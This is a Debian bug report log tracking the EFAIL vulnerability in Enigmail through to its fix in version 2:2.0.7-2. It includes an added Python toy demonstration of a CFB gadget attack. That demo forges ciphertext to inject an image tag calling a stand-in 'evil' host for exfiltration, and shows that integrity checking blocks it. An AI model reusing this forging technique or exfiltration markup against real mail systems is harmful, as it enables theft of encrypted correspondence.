enigmail: efail attack against enigmail

Related Vulnerabilities: CVE-2017-17688  

Debian Bug report logs - #898630


Reported by: Yves-Alexis Perez <corsac@debian.org>

Date: Mon, 14 May 2018 13:18:02 UTC

Severity: grave

Tags: security

Found in versions enigmail/2:1.9.9-2, enigmail/2:1.9.9-1~deb9u1, enigmail/2:1.9.8.1-1~deb8u1

Fixed in versions enigmail/2:2.0.4-1, enigmail/2:2.0.7-2

Done: Daniel Kahn Gillmor <dkg@fifthhorseman.net>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Mon, 14 May 2018 13:18:04 GMT)


Acknowledgement sent to Yves-Alexis Perez <corsac@debian.org>:
New Bug report received and forwarded. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Mon, 14 May 2018 13:18:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: Yves-Alexis Perez <corsac@debian.org>
To: team@security.debian.org
Subject: enigmail: efail attack against enigmail
Date: Mon, 14 May 2018 15:15:26 +0200
Package: enigmail
Severity: grave
Tags: security
Justification: user security hole

Hi Daniel,

In case you haven't already heard about it by now, a vulnerability has
been published against S/MIME and PGP/MIME in various email clients,
including thunderbird (and enigmail).

I'm unsure if CVE-2017-17688 (OpenPGP CFB gadget attacks) applies
to Thunderbird/enigmail or only GnuPG, but the PGP/MIME vulnerability
does apply to enigmail.

Some fixes apparently went in to enigmail 2.0.0 but I'm unsure which of
them yet, so any pointers appreciated (for example by closing with the
correct version number :).

I think we'll likely want to release a DSA too.

Regards,
-- 
Yves-Alexis

-- System Information:
Debian Release: buster/sid
  APT prefers unstable-debug
  APT policy: (500, 'unstable-debug'), (500, 'unstable'), (450, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.16.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=fr_FR.utf8, LC_CTYPE=fr_FR.utf8 (charmap=UTF-8), LANGUAGE=fr_FR.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages enigmail depends on:
ii  gnupg                    2.2.5-1
ii  gpg-agent [gnupg-agent]  2.2.5-1
pn  thunderbird | icedove    <none>

Versions of packages enigmail recommends:
ii  pinentry-gnome3 [pinentry-x11]  1.1.0-1+b1
ii  pinentry-gtk2 [pinentry-x11]    1.1.0-1+b1

enigmail suggests no packages.

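Yves-Alexis asks above whether CVE-2017-17688, the "OpenPGP CFB gadget attack", concerns the mail client or only GnuPG. The block below is an added illustration, written for this page and not taken from the bug report, the EFAIL paper, Enigmail or GnuPG: it shows in working code what a CFB gadget is and why enforcing the integrity check on the decrypting side is what decides whether the attack does anything. It is a toy model: HMAC-SHA256 truncated to 16 bytes stands in for the block cipher's forward direction (CFB never needs the inverse, so any keyed PRF demonstrates the mode), plain CFB stands in for OpenPGP's resync variant, and a SHA-256 tag appended inside the encryption stands in for the MDC. The key, IV, message, the `evil` host in the injected text and every function name are constructed for the demo. The one assumption the gadget needs, a plaintext block the attacker already knows, is the same one the real attack relies on (predictable packet headers in OpenPGP).

```python
import hashlib
import hmac

BLOCK = 16   # block size in bytes
TAG = 32     # toy integrity tag: SHA-256 of the plaintext, appended and encrypted

# Constructed demo values; nothing here is real key material or a real message.
KEY = hashlib.sha256(b"constructed demo key").digest()
IV = bytes(range(BLOCK))
SECRET = b"-----BEGIN TOY MESSAGE-----\nthe confidential body\n"
CHOSEN = b'<img src="http://evil/?">'.ljust(2 * BLOCK)   # two blocks of attacker text


def block_fn(key: bytes, block: bytes) -> bytes:
    """Forward direction E_k of the 'block cipher'. Stand-in only: not AES, not OpenPGP."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """C_i = E_k(C_{i-1}) XOR P_i with C_0 = IV; a short final block is allowed."""
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        c = xor(block_fn(key, prev), plaintext[i:i + BLOCK])
        out.append(c)
        prev = c
    return b"".join(out)


def cfb_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """P_i = E_k(C_{i-1}) XOR C_i: each keystream block depends only on the previous ciphertext block."""
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        chunk = ciphertext[i:i + BLOCK]
        out.append(xor(block_fn(key, prev), chunk))
        prev = chunk
    return b"".join(out)


def cfb_gadget(known_prev: bytes, known_ct: bytes, known_pt: bytes, chosen: bytes) -> bytes:
    """Two ciphertext blocks that decrypt to (garbage, chosen), built without the key.

    One known triple (previous block, ciphertext block, its plaintext) gives the
    attacker E_k(known_prev) = known_ct XOR known_pt. Re-using known_prev as a
    ciphertext block makes the decryptor feed it to E_k again, so the block that
    follows decrypts to known_ct XOR known_pt XOR chosen XOR E_k(known_prev) = chosen.
    known_prev itself decrypts to garbage because its own predecessor is arbitrary.
    """
    assert len(chosen) == BLOCK
    return known_prev + xor(xor(known_ct, known_pt), chosen)


def forge(known_prev: bytes, known_ct: bytes, known_pt: bytes, chosen: bytes) -> bytes:
    """Chain gadgets so every second block of the result decrypts to attacker text."""
    assert len(chosen) % BLOCK == 0
    return b"".join(cfb_gadget(known_prev, known_ct, known_pt, chosen[i:i + BLOCK])
                    for i in range(0, len(chosen), BLOCK))


def seal(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """iv || CFB(plaintext || SHA-256(plaintext)); the tag models the MDC in spirit only."""
    return iv + cfb_encrypt(key, iv, plaintext + hashlib.sha256(plaintext).digest())


def open_unchecked(key: bytes, blob: bytes) -> bytes:
    """A client that decrypts and renders without enforcing the integrity tag."""
    return cfb_decrypt(key, blob[:BLOCK], blob[BLOCK:])[:-TAG]


def open_checked(key: bytes, blob: bytes) -> bytes:
    """A client that refuses to release any plaintext when the tag does not verify."""
    pt = cfb_decrypt(key, blob[:BLOCK], blob[BLOCK:])
    body, tag = pt[:-TAG], pt[-TAG:]
    if not hmac.compare_digest(hashlib.sha256(body).digest(), tag):
        raise ValueError("integrity check failed: ciphertext was modified")
    return body


def demo():
    """Returns (what the unchecked client renders, whether the checked client rejected)."""
    blob = seal(KEY, IV, SECRET)
    # Attacker knowledge: IV, first ciphertext block, and the predictable header it encrypts.
    known_prev, known_ct, known_pt = blob[:BLOCK], blob[BLOCK:2 * BLOCK], SECRET[:BLOCK]
    # Trailing zero bytes stand where the tag would be; the unchecked client never looks at it.
    forged = known_prev + forge(known_prev, known_ct, known_pt, CHOSEN) + b"\0" * TAG
    rendered = open_unchecked(KEY, forged)
    try:
        open_checked(KEY, forged)
        rejected = False
    except ValueError:
        rejected = True
    return rendered, rejected
```

Running `demo()` shows the unchecked client rendering a message in which blocks 1 and 3 are exactly the attacker's `CHOSEN` text and blocks 0 and 2 are garbage the attacker did not choose; the real attack places that garbage inside HTML the mail client renders, so only the injected markup matters. The checked client rejects the same forged message before anything is rendered. That is the property a PGP/MIME client needs against this class of attack: a missing or failed integrity check must abort rendering, not produce a warning next to the decrypted output.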


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Tue, 15 May 2018 20:33:06 GMT)


Acknowledgement sent to David Sanders <david@sandersweb.net>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Tue, 15 May 2018 20:33:06 GMT)


Message #10 received at 898630@bugs.debian.org:

From: David Sanders <david@sandersweb.net>
To: 898630@bugs.debian.org
Subject: Re: enigmail: efail attack against enigmail
Date: Tue, 15 May 2018 16:31:17 -0400
I think this bug applies to Thunderbird as well as Enigmail and both 
packages need urgent updates.

The Enigmail part can be corrected by updating to version 2.0.3, but the 
user will still be vulnerable until a new version of Thunderbird is 
released and pushed out to users. Long term, the OpenPGP standard needs 
to be updated to address the issue.

Could the maintainers of Enigmail take for action updating to the 
already released 2.0.3? And forwarding the bug to Thunderbird for 
further action?

Thanks,
David

On Mon, 14 May 2018 15:15:26 +0200 Yves-Alexis Perez <corsac@debian.org> 
wrote:
> Package: enigmail
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Hi Daniel,
>
> in case you haven't already heard about it by now, a vulnerability has
> been published against S/MIME and PGP/MIME in various email clients,
> including thunderbird (and enigmail).
>
> I'm unsure if CVE-2017-17688 (OpenPGP CFB gadget attacks) applies
> to Thunderbird/enigmail or only GnuPG, but the PGP/MIME vulnerability
> does apply to enigmail.
>
> Some fixes apparently went in to enigmail 2.0.0 but I'm unsure which of
> them yet, so any pointers appreciated (for example by closing with the
> correct version number :).
>
> I think we'll likely want to release a DSA too.
>
> Regards,
> --
> Yves-Alexis




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Wed, 16 May 2018 11:57:03 GMT)


Acknowledgement sent to Carsten Schoenert <c.schoenert@t-online.de>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Wed, 16 May 2018 11:57:03 GMT)


Message #15 received at 898630@bugs.debian.org:

From: Carsten Schoenert <c.schoenert@t-online.de>
To: David Sanders <david@sandersweb.net>
Cc: 898630@bugs.debian.org
Subject: Re: Bug#898630: enigmail: efail attack against enigmail
Date: Wed, 16 May 2018 13:47:45 +0200
On 15.05.2018 at 22:31, David Sanders wrote:
> I think this bug applies to Thunderbird as well as Enigmail and both 
> packages need urgent updates.

...

> Could the maintainers of Enigmail take for action updating to the 
> already released 2.0.3? And forwarding the bug to Thunderbird for 
> further action?

For Thunderbird there is a separate issue created.

https://bugs.debian.org/898631

I guess the "only" problem with enigmail is that the recent package version
isn't available in unstable/testing. The main issue of Efail in Enigmail
has been fixed since Enigmail 2.0.0:

https://sourceforge.net/p/enigmail/forum/announce/thread/527a26fc/

-- 
Regards
Carsten Schoenert



Information forwarded to debian-bugs-dist@lists.debian.org, Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>:
Bug#898630; Package enigmail. (Sat, 19 May 2018 20:03:02 GMT)


Acknowledgement sent to Carsten Schoenert <c.schoenert@t-online.de>:
Extra info received and forwarded to list. Copy sent to Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>. (Sat, 19 May 2018 20:03:02 GMT)


Message #20 received at 898630@bugs.debian.org:

From: Carsten Schoenert <c.schoenert@t-online.de>
To: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
Cc: 898630@bugs.debian.org
Subject: Re: Bug#898630: enigmail: efail attack against enigmail
Date: Sat, 19 May 2018 21:59:58 +0200
Hello Daniel,

On Wed, May 16, 2018 at 01:47:45PM +0200, Carsten Schoenert wrote:
 
> I guess the "only" problem with enigmail is the recent package version
> isn't available in unstable/testing. The main issue of Efail in Enigmail
> is fixed since Enigmail 2.0.0
> 
> https://sourceforge.net/p/enigmail/forum/announce/thread/527a26fc/

during MiniDebConf in Hamburg I was playing around with the current
enigmail package from experimental with Thunderbird 52.7.0 and also with
52.8.0. It works well so far and I haven't found any issues. I think
it's safe to do an upload of Enigmail 2.0.4 to unstable as well.

Moritz also mentioned that we should not fall into the same trap as when
introducing Thunderbird ESR52 months ago, and should be prepared by getting
Enigmail into the security releases before we start to introduce the
Thunderbird 60 packages into stable-security. I think there is a low
risk, as I can't see a real problem with Enigmail on TB 52.x; other
participants of the MiniDebConf have also not seen problems regarding
Enigmail 2.x with Thunderbird 52.x.

-- 
Regards
Carsten Schoenert



Marked as found in versions enigmail/2:1.9.9-2. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:06 GMT)


Marked as fixed in versions enigmail/2:2.0.4-1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:08 GMT)


Marked as found in versions enigmail/2:1.9.9-1~deb9u1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:10 GMT)


Marked as found in versions enigmail/2:1.9.8.1-1~deb8u1. Request was from intrigeri <intrigeri@debian.org> to control@bugs.debian.org. (Sun, 27 May 2018 08:03:13 GMT)


Reply sent to Daniel Kahn Gillmor <dkg@fifthhorseman.net>:
You have taken responsibility. (Thu, 14 Jun 2018 17:25:42 GMT)


Notification sent to Yves-Alexis Perez <corsac@debian.org>:
Bug acknowledged by developer. (Thu, 14 Jun 2018 17:25:42 GMT)


Message #33 received at 898630-close@bugs.debian.org:

From: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
To: 898630-close@bugs.debian.org
Subject: Bug#898630: fixed in enigmail 2:2.0.7-2
Date: Thu, 14 Jun 2018 17:20:38 +0000
Source: enigmail
Source-Version: 2:2.0.7-2

We believe that the bug you reported is fixed in the latest version of
enigmail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 898630@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Daniel Kahn Gillmor <dkg@fifthhorseman.net> (supplier of updated enigmail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 14 Jun 2018 13:06:56 -0400
Source: enigmail
Binary: enigmail
Architecture: source
Version: 2:2.0.7-2
Distribution: unstable
Urgency: medium
Maintainer: Debian Mozilla Extension Maintainers <pkg-mozext-maintainers@lists.alioth.debian.org>
Changed-By: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
Description:
 enigmail   - GPG support for Thunderbird and Debian Icedove
Closes: 888897 898630
Changes:
 enigmail (2:2.0.7-2) unstable; urgency=medium
 .
   * acknowledge accidental move to unstable (oops)
     (closes: #888897, #898630)
   * skip unit tests for now, since they cause build failures
Checksums-Sha1:
 1304828cd34ec02a93b88f867291cc313b404d52 1774 enigmail_2.0.7-2.dsc
 0bf61b7fc0f9256f7a9c5c5bec847d4879613887 140120 enigmail_2.0.7-2.debian.tar.xz
 c66979da7b8af7cfbebaa680062700192aaa7782 11387 enigmail_2.0.7-2_amd64.buildinfo
Checksums-Sha256:
 d580f7d6440b6537d84233aa779b8918e6885bccd04d666d29c45ea048a77232 1774 enigmail_2.0.7-2.dsc
 66fa3adfd8eee0931bd447ef9cdccaa1605449929c4de8266d22bcebf0c4f3ee 140120 enigmail_2.0.7-2.debian.tar.xz
 42a0de22b357a25037ec070fee352f04cdc3d428534589b8cc898be742af33fd 11387 enigmail_2.0.7-2_amd64.buildinfo
Files:
 de95a2990b964580cc38a35b91bc0d23 1774 mail optional enigmail_2.0.7-2.dsc
 b515479c2b761c1fe827642959a43cdc 140120 mail optional enigmail_2.0.7-2.debian.tar.xz
 e7fbdbd805a5c4bef551f66a0c30c375 11387 mail optional enigmail_2.0.7-2_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQTTaP514aqS9uSbmdJsHx7ezFD6UwUCWyKhugAKCRBsHx7ezFD6
UxPiAP94Ke9WRB9ns45h8k/yxMeDFiqgpuBgXC5kPtBLAVUp+QD/QiN6ZosaJ0/X
mFjiFHtyXtcjmN8mRGLUVxe7Dwpv5wM=
=qG5D
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 11 Nov 2018 07:28:36 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:05:53 2019; Machine Name: buxtehude
